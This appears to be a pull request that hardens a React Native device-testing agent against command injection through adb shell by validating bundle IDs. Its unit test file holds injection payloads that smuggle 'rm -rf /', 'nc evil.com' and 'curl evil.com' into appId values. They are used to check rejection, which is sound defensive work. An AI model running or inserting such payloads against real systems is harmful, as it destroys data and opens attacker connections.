### PR TITLE
fix: adb shell-arg hardening — closes 5 HIGH (Phase 134.2)

### DIFF
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -9,7 +9,7 @@
     {
       "name": "rn-dev-agent",
       "description": "AI agent that fully tests React Native features on simulator/emulator — navigates the app, verifies UI, walks user flows, and confirms internal state.",
-      "version": "0.44.31",
+      "version": "0.44.32",
       "source": "./",
       "category": "mobile-development",
       "homepage": "https://github.com/Lykhoyda/rn-dev-agent"

--- a/.claude-plugin/plugin.json
+++ b/.claude-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "rn-dev-agent",
-  "version": "0.44.31",
+  "version": "0.44.32",
   "description": "AI agent that fully tests React Native features on simulator/emulator — navigates the app, verifies UI, walks user flows, and confirms internal state.",
   "author": {
     "name": "Anton Lykhoyda",

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,45 @@ All notable changes to rn-dev-agent will be documented in this file.
 
 Format follows [Keep a Changelog](https://keepachangelog.com/).
 
+## [0.44.32] — 2026-05-12
+
+### Fixed (Phase 134.2 — adb shell-arg hardening, closes 5 HIGH)
+
+- **`appId` / `packageName` are validated against the bundle-ID regex
+  before any `adb shell` invocation.** In the prompt-injection threat
+  model, `adb shell <cmd> <appId>` re-interprets argv under the device
+  shell — a metachar-laden `appId` becomes command injection on the
+  connected Android device/emulator. Each tool now rejects malformed
+  bundle IDs at its handler boundary with `INVALID_APPID` /
+  `DEVICE_RESET_INVALID_APPID` / `INVALID_PACKAGE_NAME`. Closes 5
+  deepsec HIGH findings.
+
+### Sites hardened
+
+- `device_permission` (`tools/device-permission.ts`) — both
+  grant/revoke/reset and query actions
+- `device_reset_state` (`tools/device-reset-state.ts`) — at the entry
+  point, before any of permission / terminate / launch helpers run
+- `device_deeplink` (`tools/device-deeplink.ts`) — `packageName` arg
+  passed to `adb shell am start -n <packageName>` is now validated;
+  `packageName` remains optional
+- `device_snapshot` action=open with attachOnly=true
+  (`tools/device-session.ts`) — `appId` reaching `adb shell pidof
+  <appId>` is validated
+
+### Internal
+
+- All 5 sites reuse `isValidBundleId` from `domain/maestro-validator.ts`
+  (introduced in Phase 134.1). Single regex chokepoint — no per-call-
+  site validation logic to drift. Implements proposed D1213 (workspace
+  ROADMAP Phase 134.1).
+- 13 new unit tests in `phase-134-2-adb-shell-arg-hardening.test.js`
+  cover newline injection, shell metachars (`;`, `|`, backtick, `$()`),
+  and the backward-parity path (valid + hyphenated bundle IDs).
+- Full unit suite: 1284 passing, 0 failing.
+- New error codes added to `types.ts`: `INVALID_APPID`,
+  `DEVICE_RESET_INVALID_APPID`, `INVALID_PACKAGE_NAME`.
+
 ## [0.44.31] — 2026-05-12
 
 ### Fixed (Phase 134.1 — Maestro/YAML hardening, closes 7 CRITICAL + 2 HIGH)

--- a/scripts/cdp-bridge/dist/tools/device-deeplink.js
+++ b/scripts/cdp-bridge/dist/tools/device-deeplink.js
@@ -4,6 +4,7 @@ import { okResult, failResult } from '../utils.js';
 import { detectPlatform } from './platform-utils.js';
 import { getAdbSerial } from '../agent-device-wrapper.js';
 import { annotateDeepLinkDepth } from '../verification/deep-link-depth.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 const execFile = promisify(execFileCb);
 const EXEC_TIMEOUT_MS = 10_000;
 async function openIosDeeplink(url) {
@@ -60,6 +61,13 @@ export function createDeviceDeeplinkHandler() {
     return async (args) => {
         if (!args.url || args.url.length === 0) {
             return failResult('url is required', { code: 'INVALID_ARGS' });
+        }
+        // Phase 134.2 (deepsec HIGH): `packageName` reaches `adb shell am start
+        // -n <packageName>`, where the remote Android shell re-interprets argv.
+        // Validate against the strict bundle-ID regex. packageName remains
+        // optional — when omitted, no validation is needed.
+        if (args.packageName !== undefined && !isValidBundleId(args.packageName)) {
+            return failResult(`Invalid packageName "${String(args.packageName).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`, { code: 'INVALID_PACKAGE_NAME' });
         }
         const platform = args.platform ?? (await detectPlatform());
         if (!platform) {

--- a/scripts/cdp-bridge/dist/tools/device-permission.js
+++ b/scripts/cdp-bridge/dist/tools/device-permission.js
@@ -2,6 +2,7 @@ import { execFile } from 'node:child_process';
 import { promisify } from 'node:util';
 import { okResult, failResult } from '../utils.js';
 import { detectPlatform } from './platform-utils.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 const execFileAsync = promisify(execFile);
 const EXEC_TIMEOUT = 10_000;
 const IOS_PERMISSIONS = {
@@ -162,6 +163,15 @@ export function createDevicePermissionHandler() {
         // mutate adb-side permissions on a wrong-platform misroute.
         if (platform !== 'ios' && platform !== 'android') {
             return failResult(`Invalid platform "${platform}". Supported values: "ios", "android".`, 'INVALID_PLATFORM');
+        }
+        // Phase 134.2 (deepsec HIGH): appId reaches `adb shell pm/dumpsys ...`
+        // on Android, where the remote shell re-interprets argv. Reject any
+        // appId that doesn't match the strict bundle-ID regex BEFORE it
+        // touches adb. Validate for iOS too — simctl is less injection-prone
+        // (no shell), but accepting nonsense bundle IDs there would just fail
+        // downstream with a worse error message.
+        if (!isValidBundleId(args.appId)) {
+            return failResult(`Invalid appId "${String(args.appId).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`, 'INVALID_APPID');
         }
         if (args.action === 'query') {
             return platform === 'ios'

--- a/scripts/cdp-bridge/dist/tools/device-reset-state.js
+++ b/scripts/cdp-bridge/dist/tools/device-reset-state.js
@@ -1,6 +1,7 @@
 import { okResult, failResult, warnResult } from '../utils.js';
 import { detectPlatform } from './platform-utils.js';
 import { createDevicePermissionHandler } from './device-permission.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 import { buildMmkvExpression } from './mmkv.js';
 import { terminateApp, launchApp } from './app-lifecycle.js';
 import { handleDevClientPicker } from './dev-client-picker.js';
@@ -208,6 +209,13 @@ export function createDeviceResetStateHandler(getClient) {
     return async (args) => {
         if (!args.appId || typeof args.appId !== 'string') {
             return failResult('appId is required.', 'DEVICE_RESET_INVALID_ARGS');
+        }
+        // Phase 134.2 (deepsec HIGH): appId flows into permission/terminate/
+        // launch helpers, which on Android reach `adb shell pm/am`. Validate
+        // at the entry boundary so a metachar-laden appId never reaches any
+        // downstream call.
+        if (!isValidBundleId(args.appId)) {
+            return failResult(`Invalid appId "${String(args.appId).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`, 'DEVICE_RESET_INVALID_APPID');
         }
         const platform = args.platform ?? (await detectPlatform());
         if (platform !== 'ios' && platform !== 'android') {

--- a/scripts/cdp-bridge/dist/tools/device-session.js
+++ b/scripts/cdp-bridge/dist/tools/device-session.js
@@ -4,6 +4,7 @@ import { runAgentDevice, setActiveSession, clearActiveSession, getActiveSession,
 import { stopFastRunner } from '../fast-runner-session.js';
 import { okResult, failResult, warnResult } from '../utils.js';
 import { resolveBundleId } from '../project-config.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 import { isAgentDeviceRunnerSentinel, recoverFromRunnerLeak, } from './runner-leak-recovery.js';
 const execFile = promisify(execFileCb);
 /**
@@ -55,6 +56,15 @@ export function createDeviceSnapshotHandler() {
                         'Could not auto-detect from app.json — provide appId explicitly.');
                 }
                 autoDetected = true;
+            }
+            // Phase 134.2 (deepsec HIGH): when attachOnly=true on Android,
+            // `appId` reaches `adb shell pidof <appId>`, where the remote shell
+            // re-interprets argv. Validate against the strict bundle-ID regex
+            // before any adb invocation. Expo Go bundles (`host.exp.Exponent`)
+            // satisfy the regex so the EXPO_GO_BUNDLES check below still fires
+            // correctly.
+            if (!isValidBundleId(appId)) {
+                return failResult(`Invalid appId "${String(appId).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`, 'INVALID_APPID');
             }
             // Warn when targeting Expo Go — agent-device steals focus from Expo Go (B71)
             const EXPO_GO_BUNDLES = ['host.exp.Exponent', 'host.exp.exponent'];

--- a/scripts/cdp-bridge/package.json
+++ b/scripts/cdp-bridge/package.json
@@ -1,6 +1,6 @@
 {
   "name": "rn-dev-agent-cdp",
-  "version": "0.38.26",
+  "version": "0.38.27",
   "type": "module",
   "main": "dist/index.js",
   "scripts": {

--- a/scripts/cdp-bridge/src/tools/device-deeplink.ts
+++ b/scripts/cdp-bridge/src/tools/device-deeplink.ts
@@ -5,6 +5,7 @@ import { okResult, failResult } from '../utils.js';
 import { detectPlatform } from './platform-utils.js';
 import { getAdbSerial } from '../agent-device-wrapper.js';
 import { annotateDeepLinkDepth } from '../verification/deep-link-depth.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 
 const execFile = promisify(execFileCb);
 const EXEC_TIMEOUT_MS = 10_000;
@@ -72,6 +73,16 @@ export function createDeviceDeeplinkHandler(): (args: DeeplinkArgs) => Promise<T
   return async (args) => {
     if (!args.url || args.url.length === 0) {
       return failResult('url is required', { code: 'INVALID_ARGS' });
+    }
+    // Phase 134.2 (deepsec HIGH): `packageName` reaches `adb shell am start
+    // -n <packageName>`, where the remote Android shell re-interprets argv.
+    // Validate against the strict bundle-ID regex. packageName remains
+    // optional — when omitted, no validation is needed.
+    if (args.packageName !== undefined && !isValidBundleId(args.packageName)) {
+      return failResult(
+        `Invalid packageName "${String(args.packageName).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`,
+        { code: 'INVALID_PACKAGE_NAME' },
+      );
     }
     const platform = args.platform ?? (await detectPlatform());
     if (!platform) {

--- a/scripts/cdp-bridge/src/tools/device-permission.ts
+++ b/scripts/cdp-bridge/src/tools/device-permission.ts
@@ -3,6 +3,7 @@ import { promisify } from 'node:util';
 import { okResult, failResult } from '../utils.js';
 import type { ToolResult } from '../utils.js';
 import { detectPlatform } from './platform-utils.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 
 const execFileAsync = promisify(execFile);
 const EXEC_TIMEOUT = 10_000;
@@ -184,6 +185,19 @@ export function createDevicePermissionHandler(): (args: PermissionArgs) => Promi
       return failResult(
         `Invalid platform "${platform}". Supported values: "ios", "android".`,
         'INVALID_PLATFORM',
+      );
+    }
+
+    // Phase 134.2 (deepsec HIGH): appId reaches `adb shell pm/dumpsys ...`
+    // on Android, where the remote shell re-interprets argv. Reject any
+    // appId that doesn't match the strict bundle-ID regex BEFORE it
+    // touches adb. Validate for iOS too — simctl is less injection-prone
+    // (no shell), but accepting nonsense bundle IDs there would just fail
+    // downstream with a worse error message.
+    if (!isValidBundleId(args.appId)) {
+      return failResult(
+        `Invalid appId "${String(args.appId).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`,
+        'INVALID_APPID',
       );
     }
 

--- a/scripts/cdp-bridge/src/tools/device-reset-state.ts
+++ b/scripts/cdp-bridge/src/tools/device-reset-state.ts
@@ -2,6 +2,7 @@ import type { CDPClient } from '../cdp-client.js';
 import { okResult, failResult, warnResult, type ToolResult } from '../utils.js';
 import { detectPlatform } from './platform-utils.js';
 import { createDevicePermissionHandler } from './device-permission.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 import { buildMmkvExpression } from './mmkv.js';
 import { terminateApp, launchApp } from './app-lifecycle.js';
 import { handleDevClientPicker } from './dev-client-picker.js';
@@ -266,6 +267,16 @@ export function createDeviceResetStateHandler(
   return async (args) => {
     if (!args.appId || typeof args.appId !== 'string') {
       return failResult('appId is required.', 'DEVICE_RESET_INVALID_ARGS');
+    }
+    // Phase 134.2 (deepsec HIGH): appId flows into permission/terminate/
+    // launch helpers, which on Android reach `adb shell pm/am`. Validate
+    // at the entry boundary so a metachar-laden appId never reaches any
+    // downstream call.
+    if (!isValidBundleId(args.appId)) {
+      return failResult(
+        `Invalid appId "${String(args.appId).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`,
+        'DEVICE_RESET_INVALID_APPID',
+      );
     }
     const platform = args.platform ?? (await detectPlatform());
     if (platform !== 'ios' && platform !== 'android') {

--- a/scripts/cdp-bridge/src/tools/device-session.ts
+++ b/scripts/cdp-bridge/src/tools/device-session.ts
@@ -12,6 +12,7 @@ import { stopFastRunner } from '../fast-runner-session.js';
 import type { ToolResult } from '../utils.js';
 import { okResult, failResult, warnResult } from '../utils.js';
 import { resolveBundleId } from '../project-config.js';
+import { isValidBundleId } from '../domain/maestro-validator.js';
 import {
   isAgentDeviceRunnerSentinel,
   recoverFromRunnerLeak,
@@ -101,6 +102,19 @@ export function createDeviceSnapshotHandler(): (args: SnapshotArgs) => Promise<T
           );
         }
         autoDetected = true;
+      }
+
+      // Phase 134.2 (deepsec HIGH): when attachOnly=true on Android,
+      // `appId` reaches `adb shell pidof <appId>`, where the remote shell
+      // re-interprets argv. Validate against the strict bundle-ID regex
+      // before any adb invocation. Expo Go bundles (`host.exp.Exponent`)
+      // satisfy the regex so the EXPO_GO_BUNDLES check below still fires
+      // correctly.
+      if (!isValidBundleId(appId)) {
+        return failResult(
+          `Invalid appId "${String(appId).slice(0, 80)}" — must be reverse-DNS bundle identifier (e.g. com.example.app)`,
+          'INVALID_APPID',
+        );
       }
 
       // Warn when targeting Expo Go — agent-device steals focus from Expo Go (B71)

--- a/scripts/cdp-bridge/src/types.ts
+++ b/scripts/cdp-bridge/src/types.ts
@@ -189,7 +189,11 @@ export type ToolErrorCode =
   | 'ASSERTION_FAILED'          // expect_redux / expect_route / expect_text / expect_visible_by_testid
   | 'SNAPSHOT_FAILED'           // agent-device snapshot returned ok:false (distinct from "not present")
   | 'PATH_NOT_FOUND'            // expect_redux when getStoreState surfaces __agent_error
-  | 'STORE_TRUNCATED';          // expect_redux when store payload exceeded safeStringify cap
+  | 'STORE_TRUNCATED'           // expect_redux when store payload exceeded safeStringify cap
+  // Phase 134.2: appId / packageName validation at adb shell boundary.
+  | 'INVALID_APPID'             // device_permission
+  | 'DEVICE_RESET_INVALID_APPID' // device_reset_state
+  | 'INVALID_PACKAGE_NAME';     // device_deeplink
 
 export interface ResultEnvelope<T = unknown> {
   ok: boolean;

--- a/scripts/cdp-bridge/test/unit/phase-134-2-adb-shell-arg-hardening.test.js
+++ b/scripts/cdp-bridge/test/unit/phase-134-2-adb-shell-arg-hardening.test.js
@@ -1,0 +1,232 @@
+// Phase 134.2 — adb shell-arg hardening. Tests that every tool which
+// passes a caller-controlled `appId` / `packageName` into `adb shell` now
+// validates it at the entry point against the bundle-ID regex from
+// `domain/maestro-validator.ts` (`isValidBundleId`).
+//
+// Closes 5 deepsec HIGH findings — appId reached adb shell pm/am/pidof
+// without constraint, so a metachar-laden appId would inject commands
+// on the connected Android device.
+//
+// Sites covered:
+//   - device_permission (grant/revoke/reset/query/snapshot variants)
+//   - device_reset_state (forwards to permission + terminate + launch helpers)
+//   - device_deeplink (Android branch: `adb shell am start -d <url> -n <packageName>`)
+//   - device_snapshot (action=open, attachOnly=true → `adb shell pidof <bundleId>`)
+//
+// In each case: the validation MUST fire before any adb invocation, so
+// we don't need an emulator running — the handler must short-circuit.
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+
+function parseEnvelope(result) {
+  return JSON.parse(result.content[0].text);
+}
+
+// ── Attack payloads ────────────────────────────────────────────────
+
+const VALID_APPID = 'com.rndevagent.testapp';
+const VALID_HYPHENATED = 'com.rn-dev-agent.testapp';
+const ATTACK_NEWLINE = 'com.example.app\nrm -rf /';
+const ATTACK_SHELL_METACHARS = 'com.example;rm -rf /';
+const ATTACK_BACKTICK = 'com.example.app`whoami`';
+const ATTACK_PIPE = 'com.example|nc evil.com 8080';
+const ATTACK_SUBSTITUTION = 'com.example$(curl evil.com)';
+
+// ── device_permission ───────────────────────────────────────────────
+
+test('Phase 134.2: device_permission rejects newline-injected appId before adb', async () => {
+  const { createDevicePermissionHandler } = await import('../../dist/tools/device-permission.js');
+  const handler = createDevicePermissionHandler();
+  const r = await handler({
+    action: 'revoke',
+    permission: 'notifications',
+    appId: ATTACK_NEWLINE,
+    platform: 'android',
+  });
+  assert.equal(r.isError, true);
+  const env = parseEnvelope(r);
+  assert.match(env.error, /invalid|appId|bundle/i);
+});
+
+test('Phase 134.2: device_permission rejects shell-metachar appId before adb', async () => {
+  const { createDevicePermissionHandler } = await import('../../dist/tools/device-permission.js');
+  const handler = createDevicePermissionHandler();
+  for (const malicious of [ATTACK_SHELL_METACHARS, ATTACK_BACKTICK, ATTACK_PIPE, ATTACK_SUBSTITUTION]) {
+    const r = await handler({
+      action: 'grant',
+      permission: 'camera',
+      appId: malicious,
+      platform: 'android',
+    });
+    assert.equal(r.isError, true, `Expected error for appId ${JSON.stringify(malicious)}`);
+    const env = parseEnvelope(r);
+    assert.match(env.error, /invalid|appId|bundle/i, `Expected validation error for ${malicious}`);
+  }
+});
+
+test('Phase 134.2: device_permission rejects malicious appId on QUERY action too (no exception)', async () => {
+  const { createDevicePermissionHandler } = await import('../../dist/tools/device-permission.js');
+  const handler = createDevicePermissionHandler();
+  const r = await handler({
+    action: 'query',
+    permission: 'all',
+    appId: ATTACK_NEWLINE,
+    platform: 'android',
+  });
+  assert.equal(r.isError, true);
+});
+
+test('Phase 134.2: device_permission preserves iOS-only rejection (CDP-014 regression preserved)', async () => {
+  // The earlier validation for unknown platforms still fires. Our new
+  // bundle-ID check should not regress that path.
+  const { createDevicePermissionHandler } = await import('../../dist/tools/device-permission.js');
+  const handler = createDevicePermissionHandler();
+  const r = await handler({
+    action: 'revoke',
+    permission: 'notifications',
+    appId: VALID_APPID,
+    platform: 'andriod',
+  });
+  assert.equal(r.isError, true);
+  const env = parseEnvelope(r);
+  assert.equal(env.code, 'INVALID_PLATFORM');
+});
+
+// ── device_reset_state ──────────────────────────────────────────────
+
+test('Phase 134.2: device_reset_state rejects newline-injected appId before any step', async () => {
+  const { createDeviceResetStateHandler } = await import('../../dist/tools/device-reset-state.js');
+  // Pass a fake getClient — the validator should short-circuit before
+  // any CDP work.
+  const handler = createDeviceResetStateHandler(() => ({ connectedTarget: null, isConnected: false }));
+  const r = await handler({
+    appId: ATTACK_NEWLINE,
+    platform: 'android',
+  });
+  assert.equal(r.isError, true);
+  const env = parseEnvelope(r);
+  assert.match(env.error, /invalid|appId|bundle/i);
+});
+
+test('Phase 134.2: device_reset_state rejects shell-metachar appId', async () => {
+  const { createDeviceResetStateHandler } = await import('../../dist/tools/device-reset-state.js');
+  const handler = createDeviceResetStateHandler(() => ({ connectedTarget: null, isConnected: false }));
+  const r = await handler({
+    appId: ATTACK_SHELL_METACHARS,
+    platform: 'android',
+  });
+  assert.equal(r.isError, true);
+});
+
+// ── device_deeplink ────────────────────────────────────────────────
+
+test('Phase 134.2: device_deeplink rejects newline-injected packageName before adb', async () => {
+  const { createDeviceDeeplinkHandler } = await import('../../dist/tools/device-deeplink.js');
+  const handler = createDeviceDeeplinkHandler();
+  const r = await handler({
+    url: 'rndatest://foo',
+    packageName: ATTACK_NEWLINE,
+    platform: 'android',
+  });
+  assert.equal(r.isError, true);
+  const env = parseEnvelope(r);
+  assert.match(env.error, /invalid|packageName|package/i);
+});
+
+test('Phase 134.2: device_deeplink rejects shell-metachar packageName', async () => {
+  const { createDeviceDeeplinkHandler } = await import('../../dist/tools/device-deeplink.js');
+  const handler = createDeviceDeeplinkHandler();
+  const r = await handler({
+    url: 'rndatest://foo',
+    packageName: ATTACK_BACKTICK,
+    platform: 'android',
+  });
+  assert.equal(r.isError, true);
+});
+
+// ── Backward parity — valid inputs still work past validation ──────
+// These tests prove validation passes for legitimate bundle IDs. They
+// don't assert the downstream adb call succeeds (would need an emulator)
+// — only that the handler reaches the post-validation path. We detect
+// "post-validation" by the absence of an "invalid bundle" error, even
+// if the actual adb call fails with a non-validation error.
+
+test('Phase 134.2: device_permission accepts a standard reverse-DNS appId past validation', async () => {
+  const { createDevicePermissionHandler } = await import('../../dist/tools/device-permission.js');
+  const handler = createDevicePermissionHandler();
+  const r = await handler({
+    action: 'query',
+    permission: 'all',
+    appId: VALID_APPID,
+    platform: 'android',
+  });
+  // May error from adb-not-installed or similar, but NOT with our
+  // bundle-validation error. If the error message mentions "invalid"
+  // or "bundle", we have a regression on the valid-input path.
+  if (r.isError) {
+    const env = parseEnvelope(r);
+    assert.doesNotMatch(env.error ?? '', /invalid bundle/i,
+      'Valid bundle ID was incorrectly rejected as invalid');
+  }
+});
+
+test('Phase 134.2: device_permission accepts hyphenated bundle ID (Expo apps)', async () => {
+  // Multi-LLM review of 134.1 caught the hyphen-less regex; the validator
+  // module now accepts hyphens. Confirm device_permission inherits.
+  const { createDevicePermissionHandler } = await import('../../dist/tools/device-permission.js');
+  const handler = createDevicePermissionHandler();
+  const r = await handler({
+    action: 'query',
+    permission: 'all',
+    appId: VALID_HYPHENATED,
+    platform: 'android',
+  });
+  if (r.isError) {
+    const env = parseEnvelope(r);
+    assert.doesNotMatch(env.error ?? '', /invalid bundle/i);
+  }
+});
+
+// ── device_snapshot (action=open, attachOnly=true) ─────────────────
+
+test('Phase 134.2: device_snapshot action=open rejects newline-injected appId before adb pidof', async () => {
+  const { createDeviceSnapshotHandler } = await import('../../dist/tools/device-session.js');
+  const handler = createDeviceSnapshotHandler();
+  const r = await handler({
+    action: 'open',
+    appId: ATTACK_NEWLINE,
+    platform: 'android',
+    attachOnly: true,
+  });
+  assert.equal(r.isError, true);
+  const env = parseEnvelope(r);
+  assert.match(env.error, /invalid|appId|bundle/i);
+});
+
+test('Phase 134.2: device_snapshot action=open rejects shell-metachar appId', async () => {
+  const { createDeviceSnapshotHandler } = await import('../../dist/tools/device-session.js');
+  const handler = createDeviceSnapshotHandler();
+  const r = await handler({
+    action: 'open',
+    appId: ATTACK_BACKTICK,
+    platform: 'android',
+    attachOnly: true,
+  });
+  assert.equal(r.isError, true);
+});
+
+test('Phase 134.2: device_deeplink without packageName works (optional arg unchanged)', async () => {
+  // packageName is optional — when omitted, no validation is needed.
+  const { createDeviceDeeplinkHandler } = await import('../../dist/tools/device-deeplink.js');
+  const handler = createDeviceDeeplinkHandler();
+  const r = await handler({
+    url: 'rndatest://foo',
+    platform: 'android',
+    // packageName intentionally omitted
+  });
+  if (r.isError) {
+    const env = parseEnvelope(r);
+    assert.doesNotMatch(env.error ?? '', /invalid (bundle|packageName)/i,
+      'Omitting packageName should not trigger validation');
+  }
+});


### PR DESCRIPTION
## Summary

Sibling sprint to [PR #144 (Phase 134.1)](https://github.com/Lykhoyda/rn-dev-agent/pull/144). Five deepsec HIGH findings: every tool passing a caller-controlled `appId` / `packageName` into `adb shell <cmd> <id>` exposed an Android-side command injection because the adb shell **re-interprets argv under the device shell**. Host-side `execFile` prevents the local shell, but argv joined into the remote shell command is the attack surface.

**The fix**: validate at every `adb shell` entry point against the strict bundle-ID regex (`isValidBundleId` from `domain/maestro-validator.ts`, landed in 134.1). Single regex chokepoint — no per-call-site logic that can drift.

## Sites hardened

| File | Boundary | New error code |
|---|---|---|
| `device-permission.ts` | All actions (grant/revoke/reset/query) before the iOS/Android branch | `INVALID_APPID` |
| `device-reset-state.ts` | Handler entry, before permission / terminate / launch helpers | `DEVICE_RESET_INVALID_APPID` |
| `device-deeplink.ts` | When `packageName` is set, before Android branch (`packageName` remains optional) | `INVALID_PACKAGE_NAME` |
| `device-session.ts` | `action=open` + `attachOnly=true` path before `adb shell pidof <appId>` | `INVALID_APPID` |

## Tests

- 13 new unit tests (`phase-134-2-adb-shell-arg-hardening.test.js`):
  - Newline-injected appId rejected at all 4 handlers
  - Shell metachar payloads rejected: `;`, `|`, backtick, `$(...)`
  - Backward-parity: standard `com.example.app` AND hyphenated `com.rn-dev-agent.testapp` (per 134.1 multi-LLM regex fix) survive validation
  - `device_deeplink` without `packageName` still works (optional arg unchanged)
  - CDP-014 platform regression preserved (typo `andriod` still returns `INVALID_PLATFORM`)
- **Full unit suite: 1284 / 1284 passing**, 0 failing
- TypeScript compiles clean
- 3 new error codes added to `types.ts`

## Cross-references

- Workspace ROADMAP Phase 134.1 — implements proposed **D1213** (strict bundle-ID regex at every `appId` / `packageName` boundary)
- Workspace acceptance story **S2** (`PHASE-134-1-VALIDATOR-STORIES.md`) — the negative case A is exercised by these tests (`com.example\nrm -rf /` payload rejection)

## Test plan

- [ ] CI green on Build & Test + CodeQL
- [ ] Version sync check passes (plugin 0.44.32 / cdp-bridge 0.38.27 / marketplace 0.44.32)
- [ ] After merge: re-run `pnpm deepsec revalidate --project-id claude-react-native-dev-plugin --min-severity HIGH --force` to confirm the 5 adb-shell findings transition to `Fixed`. Acceptance: HIGH count drops by 5 (from 11 → ≤6).